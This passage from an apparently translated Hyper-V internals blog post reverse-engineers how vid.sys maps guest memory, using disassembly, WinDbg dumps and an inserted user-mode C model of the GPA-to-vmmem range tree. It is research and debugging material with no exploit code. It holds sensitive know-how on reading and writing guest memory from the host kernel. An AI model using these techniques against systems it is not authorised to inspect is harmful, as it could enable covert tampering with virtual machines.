<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In short (if you don’t want to read the previous article), a VM_PROCESS_CONTEXT object is created for each virtual machine. Virtual machine memory is described by the MEMORY_BLOCK and GPAR_OBJECT structures.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For a full VM created through Hyper-V Manager, the MEMORY_BLOCK structure contains a pointer to an array of guest OS GPAs, which maps the host operating system's SPAs to those GPAs. Each MEMORY_BLOCK describes its own GPA range. Having found the specific block and obtained a GPA, you can call the IoAllocateMdl and MmMapLockedPagesSpecifyCache functions and read/write data in the guest OS memory.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When a Hyper-V container is started, a separate kernel-mode vmmem process (a minimal process) is created. The VM_PROCESS_CONTEXT object contains a reference to an array of GPAR objects, which hold the GPAs and the memory blocks’ offsets in the vmmem process. Guest memory is already mapped in the vmmem process, so to read or write it you need to find the block that describes the required GPA and read the corresponding memory block from the vmmem address space, for example with the MmCopyVirtualMemory function built into the Windows kernel.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EXO partitions have a different memory organization:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="250" src="https://lh5.googleusercontent.com/TdK_2q5hteCnc1xb3ZBq-uGgK1wPQo0eESRNSDTbY2uTYsj3c0ARnusuLrSrI6A684H3YtcllxH3LbRMcvf5aFI_O3GGC3K9blTAiYe8PiUV--z0up24kTqYTtTITHyUgvZxZJAEo5ZkmO9muA" style="margin-left: 0px; margin-top: 0px;" width="396" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Memory block mapping occurs through the vid.sys!VsmmExoGpaRangeIoctlMap call, which in turn calls vid.sys!VsmmVaGpaCoreMapGpaRange.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, we are interested in vid.sys!VsmmVaGpaCorepFindRange, which is called from vid.sys!VsmmVaGpaCorepCreateGpaToVaMappings and is passed pointers to two compare functions:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmVaGpaCorepGpnCompareFunctionByPage:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx+40h] – upper GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx+38h] – lower GPA </span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmVaGpaCorepVpnCompareFunctionByPage:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx+20h] – upper vmmem memory boundary offset</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx+18h] – lower vmmem memory boundary offset</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vid.sys!VsmmVaGpaCorepGpaRangeAllocate – allocates a pool block of 0x70 bytes.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We see the following code:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lea rcx, [r13+57A0h]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov rdx, rdi</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_RtlRbRemoveNode</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lea rcx, [r13+57B0h]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_RtlRbRemoveNode</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At offsets 0x57A0 and 0x57B0 the Prtn structure contains the structures that are passed as the first parameter to the nt!RtlRbRemoveNode function. We can see the definition of that function at:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<a href="https://processhacker.sourceforge.io/doc/ntrtl_8h.html" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://processhacker.sourceforge.io/doc/ntrtl_8h.html</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(_In_ PRTL_RB_TREE Tree, _In_ PRTL_BALANCED_NODE Node)</span></div>
</div>
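<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The following C program is an added example for this article (it is not code from the post or from vid.sys) that models the two lookups described above: the container case, where a GPA has to be matched to the GPAR record that describes it and turned into an offset in the vmmem address space, and the EXO case, where VsmmVaGpaCorepFindRange walks an RTL_RB_TREE whose compare callbacks test a page against the upper and lower bounds of a range record (+0x40/+0x38 for GPAs, +0x20/+0x18 for vmmem VAs). It reproduces the RTL_BALANCED_NODE layout (Children, ParentValue with the Red bit in the low bits), a range record whose GPA and VA bounds sit at the offsets from the disassembly, the "inside the range compares equal" trick that makes a plain RB tree act as a range map, and the translation of a guest page number to a vmmem page number. Everything else (the tree node at offset 0 of the record, the field names and padding, treating the bounds as page numbers, the constructed sample ranges, and plain BST insertion instead of nt!RtlRbInsertNodeEx) is an assumption of the example. It runs in user mode on any C11 compiler, so it can be used to check one's understanding of the structures before reading them out of a live Prtn object in the debugger.</span></div>
</div>

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* nt!_RTL_BALANCED_NODE / nt!_RTL_RB_TREE: two child pointers, then
   ParentValue whose low two bits hold the Red/Balance flags. */
typedef struct BalancedNode {
    struct BalancedNode *Children[2];   /* +0x000 Left, +0x008 Right */
    uintptr_t ParentValue;              /* +0x010 parent pointer | flag bits */
} BalancedNode;
typedef struct RbTree { BalancedNode *Root; uintptr_t Encoded; } RbTree;

/* Strip the flag bits to recover the parent pointer, as the nt!RtlRb* routines do. */
BalancedNode *rb_parent(const BalancedNode *n) { return (BalancedNode *)(n->ParentValue & ~(uintptr_t)3); }
int rb_is_red(const BalancedNode *n) { return (int)(n->ParentValue & 1); }

/* Hypothetical model of the 0x70-byte record from VsmmVaGpaCorepGpaRangeAllocate.
   Only the offsets the compare functions read (+0x18/+0x20 VA, +0x38/+0x40 GPA) come
   from the disassembly; node placement, names, padding and page-number bounds are assumed. */
typedef struct GpaRange {
    BalancedNode GpaNode;     /* +0x00 (assumed): link into a tree at Prtn+0x57A0/+0x57B0 */
    uint64_t VaLower;         /* +0x18: first vmmem VA page of the mapping */
    uint64_t VaUpper;         /* +0x20: last vmmem VA page (inclusive) */
    uint8_t  reserved0[0x10];
    uint64_t GpaLower;        /* +0x38: first guest page number */
    uint64_t GpaUpper;        /* +0x40: last guest page number (inclusive) */
    uint8_t  reserved1[0x28];
} GpaRange;
_Static_assert(sizeof(void *) != 8 || (sizeof(GpaRange) == 0x70 && offsetof(GpaRange, GpaUpper) == 0x40), "x64 layout");

/* Three-way compare in the spirit of VsmmVaGpaCorepGpnCompareFunctionByPage: upper bound
   first, then lower. A page inside the range compares "equal", which makes the tree a range map. */
int compare_gpn(uint64_t gpn, const GpaRange *r)
{
    if (gpn > r->GpaUpper) return 1;
    if (gpn < r->GpaLower) return -1;
    return 0;
}

/* Descend from the root; NULL means no range covers gpn (an unmapped guest page). */
GpaRange *find_range(const RbTree *tree, uint64_t gpn)
{
    BalancedNode *n = tree->Root;
    while (n) {
        GpaRange *r = (GpaRange *)n;        /* CONTAINING_RECORD, node is at +0 */
        int c = compare_gpn(gpn, r);
        if (c == 0) return r;
        n = n->Children[c > 0];             /* -1 -> Left (0), +1 -> Right (1) */
    }
    return NULL;
}

/* Plain BST insertion (nt!RtlRbInsertNodeEx's rebalancing is omitted; it does not affect
   lookups). Returns 0 for a range overlapping an existing one: two records claiming the
   same guest page would make translation ambiguous. */
int insert_range(RbTree *tree, GpaRange *r)
{
    BalancedNode **link = &tree->Root, *parent = NULL;
    while (*link) {
        GpaRange *cur = (GpaRange *)*link;
        if (r->GpaLower <= cur->GpaUpper && r->GpaUpper >= cur->GpaLower) return 0;
        parent = *link;
        link = &(*link)->Children[r->GpaLower > cur->GpaUpper];
    }
    memset(&r->GpaNode, 0, sizeof r->GpaNode);
    r->GpaNode.ParentValue = (uintptr_t)parent | 1;   /* a fresh RB node is red */
    *link = &r->GpaNode;
    return 1;
}

/* Guest page -> vmmem page; the offset inside the range is preserved. */
int gpn_to_vpn(const RbTree *tree, uint64_t gpn, uint64_t *vpn)
{
    GpaRange *r = find_range(tree, gpn);
    if (!r) return -1;
    *vpn = r->VaLower + (gpn - r->GpaLower);
    return 0;
}

/* Constructed sample map: three disjoint guest ranges, inserted out of order. */
RbTree *sample_tree(void)
{
    static GpaRange r[3] = {
        { .GpaLower = 0x100, .GpaUpper = 0x1FF, .VaLower = 0x2000, .VaUpper = 0x20FF },
        { .GpaLower = 0x000, .GpaUpper = 0x0FF, .VaLower = 0x1000, .VaUpper = 0x10FF },
        { .GpaLower = 0x400, .GpaUpper = 0x4FF, .VaLower = 0x3000, .VaUpper = 0x30FF } };
    static RbTree t; static int built;
    for (int i = 0; !built && i < 3; i++) insert_range(&t, &r[i]);
    built = 1;
    return &t;
}

/* Resolve a guest page through the sample map; UINT64_MAX means "not mapped". */
uint64_t sample_vpn(uint64_t gpn)
{
    uint64_t vpn = 0;
    return gpn_to_vpn(sample_tree(), gpn, &vpn) == 0 ? vpn : UINT64_MAX;
}

/* A range that overlaps an existing one must be refused by insert_range. */
int sample_rejects_overlap(void)
{
    static GpaRange bad = { .GpaLower = 0x180, .GpaUpper = 0x480, .VaLower = 0x9000, .VaUpper = 0x9300 };
    return insert_range(sample_tree(), &bad) == 0;
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The same descent can be followed by hand in a kernel debugging session: starting from the Root of the tree at the Prtn offset, run dt nt!_RTL_BALANCED_NODE on each node, compare the GPA of interest against the record's +0x40 and +0x38 fields, and take Left or Right accordingly until a record covers it or a NULL child shows the page is not mapped.</span></div>
</div>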
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">3: kd> dt -r1 nt!_RTL_RB_TREE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Root : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Children : [2] Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Left : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Right : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Red : Pos 0, 1 Bit</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Balance : Pos 0, 2 Bits</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 ParentValue : Uint8B</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Encoded : Pos 0, 1 Bit</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Min : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Children : [2] Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Left : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Right : Ptr64 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Red : Pos 0, 1 Bit</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Balance : Pos 0, 2 Bits</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 ParentValue : Uint8B</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This structure is a red-black tree. I won’t go into the theory (it is easy to look up); for our purposes it is better to see everything in practice, since we already have the compiled code in front of us.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We have two trees, VPN (probably virtual page number) and GPN (guest page number), whose tree headers (_RTL_RB_TREE) are located at offsets 57A0h and 57B0h of the Prtn structure (for 20H1), respectively.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps 0xffffd88344414000+0x57a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197a0 ffffd883`44dc9b70 - VPN tree (_RTL_RB_TREE address)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197a8 ffffd883`44dcb060 - VPN tree (_RTL_BALANCED_NODE root address)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197b0 ffffd883`443b2890 - GPN tree (_RTL_RB_TREE address)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197b8 ffffd883`48d75890 - GPN tree (_RTL_BALANCED_NODE root address)</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197c0 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`444197c8 00000000`00000000</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Consider each structure separately:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The GPN tree consists of nodes and leaves which contain, in addition to links to the other elements of the tree, a payload: the guest page number addresses (start and end GPA) and a link to a VPN node, which holds the start and end addresses of the corresponding memory block in the vmmem process.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dt _RTL_RB_TREE ffffd883`444197a0 – VPN tree</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_RTL_RB_TREE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Root : 0xffffd883`44dc9b70 _RTL_BALANCED_NODE</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Encoded : 0y0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Min : 0xffffd883`44dcb060 _RTL_BALANCED_NODE</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
